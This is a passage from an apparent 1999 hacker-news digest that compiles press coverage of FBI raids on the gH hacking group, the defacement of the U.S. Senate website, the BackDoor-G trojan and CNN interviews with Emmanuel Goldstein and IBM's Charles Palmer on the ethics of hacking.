by a denial-of-service attack. The Senate took its site offline Thursday night after attackers broke into the public computer server and replaced the congressional body’s home page with a screed against the FBI. The hacked page claimed credit on behalf of a group known as the Masters of Downloading, or M0D — and denigrated the FBI as well as Global Hell. “The FBI may be all over the other groups like ... gH and tK. ... M0D make those morons look like a group of special-ed students! FBI vs. M0D in ’99, bring it on!” read the page, which was peppered with ruder comments and hacker lingo. The intrusion “compromised our Senate Internet Web site, and as a result the Senate has taken down our Web page to do some investigation,” said Sherry Little, a spokeswoman for the Senate sergeant-at-arms, who manages the site. She said FBI agents were heading up the investigation. “They’re looking at the criminal aspects of it,” she told MSNBC. “They’re in charge of the investigation, in that they’re trying to determine where it came from and whether there was any connection at all to any incidents that they’ve explored in the past.” The Web outage rendered the official home pages of all 100 senators and senatorial committees inaccessible, but e-mail and other computer services not related to the public Web site were unaffected, Little said. System administrators for the FBI and the Senate Web sites were beefing up site security during the down time — and no one could say exactly when the sites would be returned to service. “We’re not expecting this to be a long-term problem,” Little said. The FBI was continuing its investigation into the attack on its own Web site, said Dave Miller, a media representative at the bureau’s national office. He confirmed that “this could result in criminal penalties.” Although he declined to provide specifics on the investigation, Miller told MSNBC that “it would be a logical point” that the FBI would look for connections to past attacks on federal Web sites. Earlier this month, Global Hell was implicated in attacks on a variety of U.S. government sites, including sites for the White House, several Cabinet departments and the U.S. Information Agency. Last week, Global Hell member Eric Burns (who also goes by the name Zyklon), was arrested in connection with three attacks on government computers. Members of Global Hell reported that law-enforcement officials served search warrants early Wednesday in Seattle, Houston and California. In Houston, FBI spokesman Rolando Moss told MSNBC that agents were investigating “allegations of computer intrusions” involving a teen-ager who uses the hacker handle “Mosthated.” He said the investigation was continuing and declined further comment. In telephone conversations with MSNBC, Mosthated said that his home was raided at about 6 a.m. CT Wednesday, and that family computer equipment was confiscated. He said his parents were “really mad. ... The computer had all their financial information and stuff on it.” Mosthated’s mother got on the line to read from the FBI’s receipt for the equipment and confirm that she was “really mad.” Mosthated said at least eight other people around the country had been served with search warrants as part of “a huge hacker crackdown.” Four other Houston-area hackers, three in California and one in Seattle reportedly received FBI visits. None was arrested, but all had computer equipment confiscated, he said. An FBI representative in San Diego said she could not comment on the investigation because the paperwork was sealed. Inquiries with the bureau’s Seattle office met with a similar response: “Right now there are still things that need to be decided,” one agent told MSNBC on condition of anonymity. White House Web site shut down The bureau’s Web site went out of service only hours after the raids. According to AntiOnline, a computer security site, an individual calling himself Israeli Ghost was taking credit for the attack on the FBI’s site. “FBI will not (profanity deleted) with my friends from Global Hell,” the hacker allegedly wrote in an e-mail to AntiOnline. Other members of the hacking community, contacted by MSNBC, said the FBI site was hit by what’s called a denial-of-service attack. In such an attack, the host computer is not actually controlled by an outsider; rather, outsiders bombard a Web site with so many simultaneous hits that it becomes overwhelmed and can no longer function. Mosthated said he didn’t know who was responsible for the denial-of-service attack. The FBI did ask some cursory questions about this month’s attack on the White House Web site. He said he was shown printouts of Web stories about the incident from MSNBC and CNN. “But they didn’t really push those questions,” Mosthated said. As the day went on, other Web sites — none of which had any apparent connection to the FBI — were defaced. A correspondent claiming to be a Global Hell member called Infamous sent an e-mail message to MSNBC Wednesday night criticizing the FBI and saying he “defaced over 40 web domains today to state my opinion.” The writer’s identity could not be confirmed, however. ‘THIS NEEDS TO STOP’ The response to the raids has spread through the digital underground and taken on a life of its own, a spontaneous act of retaliation that wasn’t asked for. “The retaliation has to stop,” Mosthated said. “All this ... needs to stop. Have you seen all the Web pages that have been changed in the last hour? Someone told me that there’s been more than a hundred,” he said. “This (retaliation) is just going to look worse on the people that did get raided,” said the 18-year-old Mosthated, who says he stopped hacking last summer to set up his own security firm. This impromptu show of support is going to backfire, he told MSNBC. “Everything that gH has done is going to be put on my shoulders,” owing to his position as the group’s founder. The FBI agents who executed a search warrant on Mosthated said they were looking for evidence related to “illegal telecom activity,” he said, in particular illegally set-up conference calls. “The FBI told me some company lost $250,000 because of the illegal conference calling activity,” he said. Mosthated and other sources indicated that the FBI appeared to be targeting other figures prominent in the hacker community. AntiOnline published a list of almost 100 computer handles, purportedly taken from directives sent by the FBI to Internet service providers. Seattle Times; Posted at 12:02 p.m. PDT; Tuesday, May 25, 1999 Suspect was star hacker on the Internet but shy and lonely in real life by Roberto Sanchez Seattle Times staff reporter In the world of computers, he was Zyklon, the aggressive "cracker" named after a poison gas, who had the skill to break into the Web sites of movie studios, universities and even the Chinese government. But on the other side of the monitor - according to federal prosecutors - Zyklon was really Eric Burns, a lanky, shy, 19-year-old, a former student at Shorewood High School with few friends, several run-ins with the law, and an unhealthy obsession with a woman who didn't know anything about him. Burns last week was indicted by a federal grand jury in Alexandria, Va., on three counts of computer intrusion. Prosecutors say Burns broke into hundreds of Web pages, altered files and caused thousands of dollars in damage. They say he often left behind text taunting his victims and professing his unrequited love for the woman, a former high-school classmate. Burns lives in Shoreline. But he was indicted in the Washington, D.C., suburb because that's where the compromised computer systems are located. Burns and his parents, Alice and Edward, did not return calls for comment. His lawyer, Ralph Hurvitz, advised his client not to give interviews. He said Burns will plead not guilty. Acquaintances of Burns - who also took classes at Shoreline Community College last year - describe him as the stereotypical computer nerd: shy, didn't talk to many people, had few friends and spent much of his time on the computer. "He was very smart, one of the smartest kids I know," said David Thompson, a member of Shorewood's class of 1998. "Eric knew and knows so much about computers. He's kind of a freak that way." Even the woman, whom Burns idolized in practically every Web site he hacked, said she had never talked to or been personally approached by Burns. "I didn't know who he was or what he did," she said. She said she took one law class with him her senior year of high school. After that, she began to receive letters from him, then gifts. Court records say she received a crystal bell and a diamond necklace, which her family returned. "Halfway through my senior year, someone called my house and told me to look up this (Web) address" for some of his handiwork, the woman said. She never did. She said she didn't go to the police or seek a restraining order because Burns didn't seem dangerous. "He never did anything to threaten me," she said. A former friend said Burns had a mean side, which he often expressed in his hacking and "cracking" - the term for breaking into Web sites. "He was into it for the power," said Eric Lindvall, a former student at Shorewood who was a friend of Burns' in 1994. He said he, Burns and two other students spent much of their free time together, breaking into computer or phone systems, getting access to credit-card numbers and phone accounts. Lindvall said he and Burns actually got caught by FBI agents in 1994 when they used a stolen credit-card number to buy computer equipment. They were not prosecuted, and he said he stopped spending time with Burns after that. Lindvall also said Burns and two other students were arrested in 1996 for allegedly using stolen credit-card numbers to buy computer gear, then reselling it to stores or individuals. Again, Burns was not prosecuted, he said.. An affidavit filed by the U.S. Attorney said Burns bragged online to an acquaintance about getting caught for credit fraud as a minor. The Shoreline Week, a community newspaper, published a story Oct. 2, 1996, about three Shoreline teens arrested for credit fraud. Whatever popularity Burns lacked in the real word, he made up for on the Internet. His alleged exploits were regularly featured in Web sites dedicated to computer hacking. Some people even admired him; a cracker who defaced the University of Washington's engineering Web site in April dedicated the deed to Zyklon. Zyklon apparently took his name from the gas used by Nazi Germany to exterminate Jews. Burns will be arraigned on June 14. If guilty, he faces up to 15 years in prison. Roberto Sanchez's phone message number is 206-464-8522. Copyright © 1999 Seattle Times Company @HWA 15.1 Real life hacker wargames ~~~~~~~~~~~~~~~~~~~~~~~~~ RAIDED HACKERS by BHZ, Friday 28th May 1999 on 6.32 pm CET Our new Special Report talks about recent hackers versus Govenment, and FBI versus hackers relations. White House was hacked, US Senate was hacked but several hackers have been found. Read the article Real hacker war-games. Real hacker war-games Recently hackers became more and more active. US government and Universities are keep being hacked. Even the official White House site (www.whitehouse.gov) was hacked, and replaced with anti-Clinton messages and pictures. Government struck. Eric Burns aka Zyklon, a gH member was caught and indicted on the count of several break-ins. His name was also mentioned in "greetz" area of hacked White House site, so he was questioned about it too. Zyklon, 19 year old, could get up to 15 years of imprisonment. His fellow hackers from gH hacked in revenge several domains with messages of protest against the Government. MAST3RZ 0F D0WNL0ADING earlier today hacked the official US Senate site (www.senate.gov), and wrote about battle against FBI and US government. FBI site (www.fbi.gov) was under big DoS (denial of service) attack, and the "attacker" mailed HNN about it (read his mail in HNN Buffer Overflow section). Today AntiOnline and HNN published more details of hackers raided by FBI 2 days ago. HNN wrote that :"some of those who where raided where iCBM, MostHated, loophole, soulblazer, fryz, vallah and Cl0pz". We found out that following hackers were too involved in this FBI actions: - Zyklon (he is found and indicted) - Spacegoat (already found) - Spade (already found) - Overfien (still looking for him) - Rottenboy (still looking for him) - Hybrid (still looking for him) - Sketch (still looking for him) - Lord Omino (still looking for him) The crew from Channel 12 did a background check on the hackers and their supposed crimes. - Rottenboy aka PowerDragon is wanted for telecommunications fraud - Gino Ramano is also wanted for telecommunications fraud - Lord Omino aka moviesmith is too wanted for telecommunications fraud - Overfien is suspected in: 1.hacking various subnets for the hacker group GH 2.hacking mit.edu, zapnow.com, wwu.edu, washington.edu 3.cracking into syprnet (governments classified network) 4.leaving 221 computers infilitrated with the words "overfien wuz here" 5.wanted in oregon for western union fraud "$60,000" 6.also possible accounts of forger and theft - Sketch aka mode is wanted for telecommunications fraud - Grip aka JF is wanted for hacking - loophole aka Elaich is also wanted for hacking - Hybrid is wanted for telecommunications fraud BHZ for Help Net Security http://net-security.org @HWA 16.0 MOD hacks Senate site ~~~~~~~~~~~~~~~~~~~~~ From http://www.maximumpcmag.com/ 05.28.99 11:53 Hackers Add Senate To Victims Hackers have added the U.S. Senate's main page to their list of owned web sites in an escalating war between the FBI and "crackers" around the globe. Hackers defaced the main page for the Senate late Thursday leaving the message: "The FBI may be all over the other groupz, like those gH and tK queerz, cl00bagz gal0re. M0D make th0se m0ronz l00k like a gr0up of special-ed st00dentz!@# FBI vs. M0D in '99, BR1NG IT 0N FUQRZ! (BTW NIPC IZ ALS0 0WNED)." Members of the MOD group told security site, Antionline, that they gained access to another computer on the Senate's network, installed a sniffer, and swiped the administrators passwords. On Friday, the Senate's page was still down but a mirror of the hacked site was kept on Antionline. On Wednesday, an attack on the FBI's main page spooked the agency enough to take down its main page. The FBI's page also remained down Friday morning. Related Story: FBI Site Attacked FBI Site Attacked The latest victim in a skirmish between hackers and the FBI may have been the brown-shoes own web site. The FBI's main web page remained offline Thursday afternoon while the Bureau checked it for security intrusions. The FBI reportedly took the page down Wednesday after someone attempted to hack it. The skirmish apparently began Wednesday morning when FBI agents in the Houston office raided the homes of hackers who allegedly belonged to a group called "gH." Agents did not arrest anyone but confiscated computers of numerous people. According to security news site, antionline.com, the FBI has also directed numerous ISPs to preserve backup tapes, logs, e-mail, and IRC conversations for about thirty individuals suspected of being hackers. Nando Times; Hackers take down FBI and Senate Internet sites Copyright © 1999 Nando Media Copyright © 1999 Associated Press By TED BRIDIS WASHINGTON (May 28, 1999 12:04 a.m. EDT http://www.nandotimes.com) - Computer hackers continued a series of electronic attacks against Internet sites of federal agencies on Thursday, defacing the Web page for the U.S. Senate before it was taken down. The Web site for the FBI also remained inaccessible late Thursday, a day after the agency said hackers tried unsuccessfully to compromise it. It was unclear when the FBI site might be made available again. "There was an attempt (Wednesday) by unknown persons to unlawfully gain access to the FBI.Gov Web site," according to a statement Thursday from the agency. "It was unsuccessful; however, as a precaution, the FBI shut down the site and is now taking additional steps to further insulate it." An obscene message left briefly on the Senate's Web site Thursday blamed the attack on what it said was the FBI's harassment of specific hacker groups, including the group that took credit for breaking into the White House site earlier this month. "Who laughs last? ...," the message said, adding that the intent was to send a monition "... to our friends at the FBI." Other federal Web sites, including those for the White House and the House of Representatives, appeared to be operating normally late Thursday. MSNBC reported that the attacks stemmed from the FBI's executing a search warrant on the home of a prominent hacker in Houston, Texas. FBI spokesman Rolando Moss confirmed that agents were investigating allegations of computer intrusions involving the Houston hacker. The FBI executed four search warrants that remained sealed, Moss said. Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer intrusion. Burns is reportedly known on the Internet as "Zyklon" and believed to be a member of the group that claimed responsibility for the attacks on the White House and the Senate sites. Federal prosecutors accused Burns of breaking into a computer between August 1998 and January 1999 in northern Virginia that is used by the U.S. Information Agency. "Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion. The grand jury also accused Burns of breaking into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington. CNN; Hackers react to FBI crackdown by invading Senate Web site May 27, 1999 Web posted at: 11:04 p.m. EDT (0304 GMT) WASHINGTON (CNN) -- Computer hackers reacted to an FBI crackdown by launching cyber assaults Thursday on government Web sites, including the one belonging to the U.S. Senate. People calling up the Senate Web site on Thursday were redirected to one belonging to the hackers. Posted on the site under the hackers' logo was the question: "Who laughs last?" The cyber intruders wrote that their Internet invasion of the legislative site was a way for them to thumb their noses at the FBI. Federal agents earlier this week executed search warrants on suspected hackers' homes in Dallas, Houston and other locations. FBI sources did not specify if anyone was arrested, but said they believe word of the raids quickly spread in the computer community. That attempt to crack down on computer hackers preceded a seemingly coordinated cyber attack that overloaded the FBI's own Web site, forcing the agency to shut down the site, officials said Thursday. FBI officials said their site was besieged with computer hits by scores of computer users who were apparently outraged over the raids. No virus was planted in the FBI site, but the sheer number of hits overloaded the system, said FBI spokesman Frank Scafidi, who described the incident as a "denial of service attack." He said the system has been shut down temporarily so additional firewalls can be erected to protect it. It was unclear when the site would be back up. The FBI's site contains general information about the agency and does not house sensitive information. Justice Correspondent Pierre Thomas contributed to this report. @HWA 17.0 Backdoor-G a new 'backorifice like' trojan and BO2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com Back Orifice, NetBus, and now BackDoor-G contributed by N4vi11Us Yet another Trojan horse that leaves MS Windows systems wide open has been discovered. This new backdoor tool is similar to Back Orifice or NetBus. NetBus is now a commercial shareware product. Back Orifice has undergone a major rewrite and a new version, BO2K, is expected to be released at this years DefCon hacker convention. Once a a system has had any one of these programs installed they become wide open to unknown remote users who have complete control over the system. MSNBC ZD Net From MSNBC; http://www.msnbc.com/news/274094.asp New Back Orifice-like Trojan found BackDoor-G allows remote access to victim’s PC; Trojan horse arrives as spam with screen saver or game update By Bob Sullivan MSNBC May 27 — Security researchers at Network Associates Inc. say they have found another Back Orifice-like Trojan Horse hack tool called BackDoor-G. The Trojan horse arrives in a user’s e-mail posing as a screen saver or game update, but once executed, it turns the victim’s PC into an “open client.” Then, a hacker can add, delete, move or execute files on the victim’s computer at will from anywhere on the Internet. BACKDOOR-G IS BEING SENT out in spam mail, according to Sal Viveros, group marketing manager at Network Associates. The company discovered it Wednesday. Updated versions of virus scanning software, including Network Associates products, will detect BackDoor-G and clean it from a victim’s system. Such “remote administration tools” started to surface last year when Back Orifice was released by a group calling itself the Cult of the Dead Cow. NetBus, another such tool, has since been developed into a commercial product by its author. With both programs, a victim is tricked into executing an e-mail attachment which then opens his PC to remote connections via the Internet. Once a victim is infected, a hacker can do anything to a machine that the victim can — included erasing all files or copying all files. Such tools represent a dangerous blending of what might once have been considered relatively harmless pranks by virus writers and hackers, Viveros said “We’re seeing these types of malicious code attacks, which are trying to attack information directly or indirectly,” he said. “Now we’re seeming to blur the lines between malicious code attacks and [data] vulnerability.” BackDoor-G already has a variant — a very similar Trojan named “Armageddon” was discovered in France this morning. Several Network Associates clients opened the attachment and exposed their systems, Viveros said. But when the promised screen saver did not execute, they called the virus company. @HWA 18.0 [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I didn't see a date on the following interviews but they appear fairly timeless so since I just found them I thought i'd share em with you...- Ed http://www.cnn.com/TECH/specials/hackers/qandas/ Q&A with Emmanuel Goldstein of 2600: The Hacker's Quarterly (CNN) -- Emmanuel Goldstein is the editor-in-chief of 2600: The Hacker Quarterly and hosts a weekly radio program in New York called "Off the Hook." 1. How do you define hacking? Hacking is, very simply, asking a lot of questions and refusing to stop asking. This is why computers are perfect for inquisitive people -- they don't tell you to shut up when you keep asking questions or inputting commands over and over and over. But hacking doesn't have to confine itself to computers. Anyone with an inquisitive mind, a sense of adventure and strong beliefs in free speech and the right to know most definitely has a bit of the hacker spirit in them. 2. Are there legal or appropriate forms of hacking? One of the common misconceptions is that anyone considered a hacker is doing something illegal. It's a sad commentary on the state of our society when someone who is basically seeking knowledge and the truth is assumed to be up to something nefarious. Nothing could be further from the truth. Hackers, in their idealistic naiveté, reveal the facts that they discover, without regard for money, corporate secrets or government coverups. We have nothing to hide, which is why we're always relatively open with the things we do -- whether it's having meetings in a public place or running a system for everyone to participate in regardless of background. The fact that we don't "play the game" of secrets also makes hackers a tremendous threat in the eyes of many who want to keep things away from the public. Secrets are all well and good, but if the only thing keeping them a secret is the fact that you say it's a secret, then it's not really a very good secret. We suggest using strong encryption for those really interested in keeping things out of the hands of outsiders. It's interesting also that hackers are the ones who are always pushing strong encryption -- if we were truly interested in getting into everyone's personal affairs, it's unlikely we'd try and show them how to stay secure. There are, however, entities who are trying to weaken encryption. People should look toward them with concern, as they are the true threat to privacy. 3. What in your mind is the purpose of hacking? To seek knowledge, discover something new, be the first one to find a particular weakness in a computer system or the first to be able to get a certain result from a program. As mentioned above, this doesn't have to confine itself to the world of computers. Anyone who's an adventurer or explorer of some sort, or any good investigative journalist, knows the feeling of wanting to do something nobody has ever done before or find the answer despite being told that you can't. One thing that all of the people involved in these endeavors seem to share is the feeling from outsiders that they're wasting their time. 4. Are you a hacker? Why? Or why not? Absolutely. It's not something you can just erase from your personality, nor should you want to. Once you lose the desire to mess around with things, tweak programs and systems, or just pursue an answer doggedly until you get a result, you've lost a very important part of yourself. It's quite possible that many "reformed" hackers will lose that special ingredient as they become more and more a part of some other entity that demands their very souls. But for those who can resist this, or figure out a way to incorporate "legitimacy" into their hacker personalities without compromising them, there are some very interesting and fun times ahead. 5. What kind of hacking do you do? My main interest has always been phones and rarely does a day pass when I don't experiment in some way with a phone system, voice mail system, pay phone, or my own telephone. I've always been fascinated by the fact that we're only a few buttons away from virtually anyone on the planet and I hope that I never lose that sense of marvel. One of the most amazing things I ever got involved in was routing phone calls within the network itself -- known as blue-boxing. You can't do that as easily any more, but it was a real fun way to learn how everything was connected -- operators, services, countries, you name it. And in the not-too-distant past, there were so many different sounds phones made depending on where you were calling. Now they tend to be standardized rings, busies, etc. But the magic hasn't disappeared, it's just moved on to new things ... satellite technology, new phone networks and voice recognition technologies. Many times these new technologies are designed by the very people who were hacking the old technologies. The result is usually more security and systems that know what people will find useful. While I've spent a great deal of time playing with phones, I get the same sense of fun from computer systems and have invested lots of time exploring the Internet. It would fill a book to outline all of the hacker potential that exists out there. And, of course, there's radio hacking, which predates a lot of the current technology. It's gotten to the point where simply listening to a certain frequency has become a challenge. It's hard to believe that it's actually turned into a crime to listen to some of these non-scrambled radio waves. But this is the price we pay when people with no understanding of technology are the ones in charge of regulating it. 6. How much time do you spend at it a week? That's like asking how much time you spend breathing. It's always with you, you do more of it at certain times, but it's always something that's going on in your head. Even when I sleep, I dream from a hacker perspective. 7. Do you have a certain kind of site or "target" sites that most attract you? We don't sit around with a big map and a list of targets. In fact, we don't even sit around together. Most hacking is done by individuals who simply find things by messing around and making discoveries. We share that info and others add input. Then someone tells the press and the government that we're plotting to move satellites and all hell breaks loose. I think most of us tend to be drawn to the sites and systems that are said to be impossible to access. This is a normal human reaction to being challenged. The very fact that we continue to do this after so many of us have suffered so greatly indicates that this is a very strong driving force. When this finally becomes recognized as a positive thing, perhaps we'll really be able to learn from each other. 8. What, in general, do you think attracts people to hacking? People have always been attracted to adventure and exploration. Never before have you been able to get this without leaving your house and without regard to your skin color, religion, sex, or even the sound of your voice. On the Internet, everyone is an equal until they prove themselves to be a moron. And even then, you can always start over. It's the ability to go anywhere, talk to anyone, and not reveal your personal information unless you choose to -- or don't know enough not to -- that most attracts people to the hacker culture, which is slowly becoming the Internet culture. We find that many "mainstream" people share the values of hackers -- the value of free speech, the power of the individual against the state or the corporation, and the overall sense of fun that we embrace. Look in any movie where an individual is fighting a huge entity, and who does the audience without exception identify with? Even if the character breaks the rules, most people want him/her to succeed because the individual is what it's all about. 9. Do you know enough hackers personally to know what personality traits they share, if any? Hackers come from all different backgrounds and have all kinds of lifestyles. They aren't the geeks you see on television or the cyberterrorists you see in Janet Reno news conferences. They range in age from under 10 to over 70. They exist in all parts of the world, and one of the most amazing and inspiring things is to see what happens when they come together. It's all about technology, the thrill of discovery, and sharing information. That supersedes any personality issues that might be an issue in other circumstances. 10. Do you think hackers are productive and serve a useful purpose? I think hackers are necessary, and the future of technology and society itself (freedom, privacy, etc.) hinges on how we address the issues today that hackers are very much a part of. This can be the dawning of a great era. It can also be the beginning of true hell. 11. What percentage would you say are destructive as opposed to those in it out of intellectual curiosity or to test their skills? This raises several points that I feel strongly about. For one thing, hacking is the only field where the media believes anyone who says they're a hacker. Would you believe someone who said they were a cop? Or a doctor? Or an airline pilot? Odds are they'd have to prove their ability at some point or say something that obviously makes some degree of sense. But you can walk up to any reporter and say you're a hacker and they will write a story about you telling the world that you're exactly what you say you are without any real proof. So every time a movie like "Hackers" comes out, 10 million people from AOL send us e-mail saying they want to be hackers, too, and suddenly, every 12-year-old with this sentiment instantly becomes a hacker in the eyes of the media and hence, the rest of society. You don't become a hacker by snapping your fingers. It's not about getting easy answers or making free phone calls or logging into someone else's computer. Hackers "feel" what they do, and it excites them. I find that if the people around you think you're wasting your time but you genuinely like what you're doing, you're driven by it, and you're relentless in your pursuit, you have a good part of a hacker in you. But if you're mobbed by people who are looking for free phone calls, software or exploits, you're just an opportunist, possibly even a criminal. We already have words for these people and it adequately defines what they do. While it's certainly possible to use hacking ability to commit a crime, once you do this you cease being a hacker and commence being a criminal. It's really not a hard distinction to make. Now, we have a small but vocal group who insist on calling anyone they deem unacceptable in the hacker world a "cracker." This is an attempt to solve the problem of the misuse of the word "hacker" by simply misusing a new word. It's a very misguided, though well-intentioned, effort. The main problem is that when you make up such a word, no further definition is required. When you label someone with a word that says they're evil, you never really find out what the evil was to begin with. Murderer, that's easy. Burglar, embezzler, rapist, kidnapper, all pretty clear. Now along comes cracker and you don't even know what the crime was. It could be crashing every computer system in Botswana. Or it could be copying a single file. We need to avoid the labeling and start looking at what we're actually talking about. But at the same time, we have to remember that you don't become a hacker simply because you say you are. 12. Do people stay in hacking a long time, or is it the kind of thing that people do for a few years and then move on to something else? It can be either. I tend to believe that it's more of a philosophy, a way of looking at something. When you have the hacker perspective, you see potential where others don't. Also, hackers think of things like phones, computers, pagers, etc., as toys and things to be enjoyed whereas others see work and responsibility and actually come to dread these things. That's why hackers like to hold onto their world and not become part of the mainstream. But it certainly can and does happen. 13. What is the future of hacking? As long as the human spirit is alive, there will always be hackers. We may have a hell of a fight on our hands if we continue to be imprisoned and victimized for exploring, but that will do anything but stop us. 14. Given increased attention to corporate and government security, is it getting tougher to hack or not? Hacking isn't really about success -- it's more the process of discovery. Even if real security is implemented, there will always be new systems, new developments, new vulnerabilities. Hackers are always going to be necessary to the process and we're not easily bored. 15. Is the possibility of being identified and even prosecuted an issue for most hackers? Hackers make very bad criminals. This is why we always wind up being prosecuted. We don't hide very well or keep our mouths sealed shut to protect corporate or government interests. But the same security holes would exist even if we weren't around, so I think the hackers should be properly seen as messengers. That doesn't mean that you should expect them to just hand over all of their knowledge -- it's important to listen and interpret on your own, as any hacker would. 16. Are there hackers who are up for hire? What are they paid? Who hires them, and for what? Just as you can use hacker ability to attain a life of crime, you can use that ability to become a corporate success. Some are able to hold onto their hacker ideals. Others, sadly, lose them. It's especially hard when young people who haven't worked it all out yet are approached and tempted with huge amounts of money by these entities. It can be very hard to resist and the cost is often greater than anticipated. 17. Have you had any contact with people you consider cyberterrorists? Do you endorse what they do? In all of the time I've been in the scene, which is a pretty long time, I've never come across anyone I consider to be a "cyberterrorist," whatever that is. Most people who talk of such creatures either have something to sell or some bill to pass. This is not to say that such a concept is impossible. But I believe the current discussions aren't based in reality and have very suspicious ulterior motives. 18. What about the people who hack into Pentagon sites? Do you think they should be punished? According to the Pentagon, there is no risk of anything classified being compromised because it's not on the Internet. If they were wrong, I would like to see someone prove that. If a non-classified site is hacked, I don't see the harm unless something is damaged in some way. Remember, the security hole was already there. If a hacker finds it, it's far more likely the people running the system will learn of the hole. If a criminal or someone with an ulterior motive (espionage, etc.) finds the hole first, it's likely to remain secret for much longer and the harm will be far greater. While you may resent the fact that some 14-year-old from Topeka proved your security sucks, think of what could have happened had you not learned of this and had someone else done it instead. I'm the first to say that people who cause damage should be punished, but I really don't think prison should be considered for something like this unless the offender is a true risk to society. The great majority of these cases do not involve damage or vandalism, a fact that largely goes unreported. What people have to remember is that most of the time, this is simply an example of kids being kids and playing games like they have always done. Obviously, the tools have changed, but that's really not something the kids are responsible for. If some kid somewhere can access your medical records or your phone records, he or she is not the one who put them there. The true violator of your privacy is the person who made the decision to make them easily accessible. 19. Your real name is Eric Corley. Why do you use the name Emmanuel Goldstein? I believe everyone should be given the opportunity to name themselves. That name should reflect something about who you are and what you believe in and stand for. Emmanuel Goldstein is that for me, and for those who want to learn why, get a copy of George Orwell's "1984" and see for yourself. Interestingly, our first issue of 2600 was published in January 1984. A complete coincidence. 19.0 [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/specials/hackers/qandas/ Q&A with IBM's Charles Palmer (CNN) -- Dr. Charles C. Palmer is the manager of Network Security and Cryptography and head of the Global Security Analysis Lab, which includes IBM's ethical hacking unit. 1. How do you define hacking? Hacking is unauthorized use of computer and network resources. (The term "hacker" originally meant a very gifted programmer. In recent years though, with easier access to multiple systems, it now has negative implications.) 2. Are there appropriate forms of hacking? Hacking is a felony in the United States and most other countries. When it is done by request and under a contract between an ethical hacker and an organization, it's OK. The key difference is that the ethical hacker has authorization to probe the target. 3. What do you and the other members of your team do? (We) work with IBM Consulting and its customers to design and execute thorough evaluations of their computer and network security. Depending on the evaluation they request (ranging from Web server probes to all-out attacks), we gather as much information as we can about the target from publicly available sources. As we learn more about the target, its subsidiaries and network connectivity, we begin to probe for weaknesses. Examples of weaknesses include poor configuration of Web servers, old or unpatched software, disabled security controls, and poorly chosen or default passwords. As we find and exploit vulnerabilities, we document if and how we gained access, as well as if anyone at the organization noticed. (In nearly all the cases, the Information Syhstems department is not informed of these planned attacks.) Then we work with the customer to address the issues we've discovered. 4. What is the background of the people on your team? We have Ph.D.s in physics, computer scientists, and even one former photographer with a fine arts degree. They are all well-known, highly respected system security professionals from around the world. Most of them did not start their careers in this area, but ended up doing computer and network security because they were provoked by hackers at one time. Once they started on the road to improving security, they got hooked on the challenges it presents. 5. In "Helpful Hacking" from IBM Research magazine in 1997, you are quoted as saying you don't hire reformed hackers and "there's no such thing." Could you explain? The number of really gifted hackers in the world is very small, but there are lots of wannabes.... When we do an ethical hack, we could be holding the keys to that company once we gain access. It's too great a risk for our customers to be put in a compromising position. With access to so many systems and so much information, the temptation for a former hacker could be too great -- like a kid in an unattended candy store. 6. Is it fair to say that you are opposed to hacking? As I said before, hacking is a felony -- for good reason. Some of the "joyriders" -- hackers who access systems just for the challenge -- think it's harmless since they usually don't "do" anything besides go in and look around. But if a stranger came into your house, looked through everything, touched several items, and left (after building a small, out of the way door to be sure he could easily enter again), would you consider that harmless? These joyriders could be causing damage inadvertently since just by their presence they are using system resources. 7. Do you think hacking can be useful? Hacking can be useful in a controlled environment where there are ground rules and contractual agreements. 8. Do you have a profile of the typical hacker? The profile has broadened in the last couple of years to include many types of people, which makes it very difficult to call out a "typical" hacker. The motivations behind hacking have changed (see Answer No. 11 below). No longer are hackers limited to the teen-age, soda-slurping misfits, although they're probably the majority. There are girls and even younger kids. Many companies think all hackers come from outside, but surveys continue to show that the threat from inside an organization is greater than from outside. So if your system is compromised, it could be a Gen-Xer sitting in a dark apartment, or the woman in the cubicle next to you. 9. There have been reported instances where corporate security personnel have tracked hacking back to the source, broken in and stolen computers, or even used force. Do you endorse "vigilantism" as a response to hacking? I've heard those stories, too, and I don't believe most of them. It makes zero sense to respond to an illegal attack with another illegal attack. First of all, it can be very difficult to accurately determine where an attack comes from. Whether they end up retaliating against the right or wrong person, they've committed a felony and are just as guilty as the original perpetrator. It's no different than other forms of vigilante justice. 10. What about attacking Web sites that list hacking scripts? Again, any attack is a felony. It's a First Amendment rights issue as well. Where do you draw the line? Attacking adult sites? Attacking spammers? It makes more sense for corporations, schools and other organizations to try to block access to those sites. 11. Can you characterize the nature of most hacking attacks? A few years ago, the original motivations were pursuit of knowledge and the desire to "show off" one's skills. Now, there are new lures of money and power. However, the statistics can be misleading, so many of these incidents go unreported due to lack of detection or fear of further losses due to tarnished image and credibility. I believe that the majority of hacks are still motivated by curiosity and a desire to point out system weaknesses. However, as organizations have been finding, most of today's threats come from within the organization. According to a recent META Group study, current figures indicate that recent breaches of security within Information Technology organizations occur internally 58 percent of the time. The threat from the outside is rising at a steady rate, though. 12. Is there a trend in these attacks? Denial-of-service attacks and macro-viruses are the most popular hacker activities. The denial-of-service attacks are fairly easy for hackers of all skill levels -- from "script-kids" to professionals -- to launch. This is a situation where a company's Web site or online service is simply made unavailable by a hacker overtaxing the system resources. It doesn't sound that harmful, but there can be serious monetary and image losses attached to this. If you want to buy a book and you go to a popular book-selling Web site and find that site unavailable, chances are you'll try the next most popular book Web site. There's simply too much competition on the Internet right now to overlook security needs. These denial-of-service attacks are particularly troubling because they are hard to defend against. There are defenses available with firewall products from IBM and other companies, but there can be denial-of-service attacks from inside as well, which lends credence to the argument for Intranet firewalls. 13. Where does the real threat of hacking lie: in the private sector, in government or somewhere else? The widely reported attacks against government sites are troubling, but it's a good bet that the government would not have any sensitive information on a machine connected to the Internet. An unfortunate side effect of these reports is that people end up thinking that securing systems and networks is hard. It's not hard, but it does take time and training, and it's an ongoing process to stay one step 